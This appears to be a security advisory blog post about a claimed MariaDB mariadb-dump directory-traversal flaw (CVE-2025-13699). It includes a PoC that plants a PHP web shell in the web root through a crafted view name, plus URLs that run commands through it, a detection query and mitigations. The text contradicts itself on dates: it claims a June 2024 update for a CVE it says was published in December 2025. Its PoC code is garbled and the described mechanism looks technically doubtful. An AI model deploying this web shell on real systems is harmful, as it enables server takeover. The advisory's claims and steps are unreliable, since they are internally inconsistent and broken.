*Last updated: June 2024*

A serious vulnerability, CVE-2025-13699, has been discovered in MariaDB that can allow remote attackers to run arbitrary commands by tricking MariaDB’s mariadb-dump utility into unsafe file operations. This flaw, tracked as ZDI-CAN-27000, is especially dangerous because it can lead to remote code execution (RCE) under certain conditions.

Below, we’ll break down the vulnerability, show you how it can be exploited, and provide guidance on securing your systems.

What is mariadb-dump?

mariadb-dump is a command line tool used for backing up MariaDB databases. You run it to export databases, tables, or views into a file for later restoration or migration.

The Vulnerability: Directory Traversal via View Names

The bug exists in how mariadb-dump processes view names when creating dump files.

Normally, database and view names are sanitized before being used in file paths. However, in affected MariaDB versions, there is insufficient validation when a view name containing directory traversal characters (such as ../) is handled. This can let an attacker create a specially-named view, and when mariadb-dump is run, it writes output files to incorrect, attacker-chosen paths on the server.

If the attacker can control view names and trigger a backup, they can potentially write files anywhere the database process has write permissions – which may allow for code execution.

Exploit Scenario

Imagine a MariaDB server exposed to users who can create views, and a backup or CI process that routinely runs mariadb-dump.

The attacker connects to the database and creates a malicious view

CREATE VIEW ../../../../var/www/html/shell.php AS SELECT '<?php system($_GET["c"]); ?>';

*This view name includes directory traversal (../../..) and points to a web root directory.*

When a well-meaning admin or automated job runs

mariadb-dump -u someuser -p --all-databases > backup.sql

The tool follows the view name and writes a file to /var/www/html/shell.php. If the website is hosted there, the attacker can immediately visit http://yourserver.com/shell.php?c=whoami to execute arbitrary commands.

Proof of Concept: Step-by-step

Below is a simplified proof-of-concept (PoC) using MariaDB and a webserver environment.

`sql

CREATE VIEW ../../../../var/www/html/pwned.php AS SELECT '';

`sh

mariadb-dump -u admin -p database > /tmp/dump.sql

`sh

ls /var/www/html/pwned.php

`

/var/www/html/pwned.php

`

http://your-vulnerable-app.com/pwned.php?cmd=id

Real-World Impact

- Remote code execution: If web root or other sensitive directories are writable, attackers can gain full control.
- Information disclosure or sabotage: Overwriting config files or logs, causing denial of service, or leaking data.
- Attack chain: Combined with other vulnerabilities or weak configurations, this bug could be devastating.

Important Notes

- This requires someone (often an admin or automated job) to run mariadb-dump after a malicious view is created by an attacker.
- If users cannot create arbitrary view names, or mariadb-dump is not run, risk is significantly lower.

Look for unusually named view objects in your databases

SELECT TABLE_SCHEMA, TABLE_NAME 
FROM information_schema.VIEWS 
WHERE TABLE_NAME LIKE '%../%';

Vendor Patch: MariaDB has not formally patched this as of June 2024, but please monitor

- MariaDB Security Advisories
- ZDI Report ZDI-CAN-27000

Sanitize view (and table) names manually before using mariadb-dump.

- Restrict the ability to create views/databases to administrative users only.

References

1. CVE-2025-13699 Entry (MITRE)
2. ZDI Advisory ZDI-CAN-27000
3. Official MariaDB Security
4. MariaDB Forums & Updates


Summary:
If you use MariaDB and allow users to create views, review your backup and scripting procedures. Until a patch is applied, restrict dumper access, monitor for suspicious view names, and never run potentially dangerous processes with elevated permissions.

Timeline

Published on: 12/23/2025 22:15:44 UTC
Last modified on: 12/29/2025 15:58:56 UTC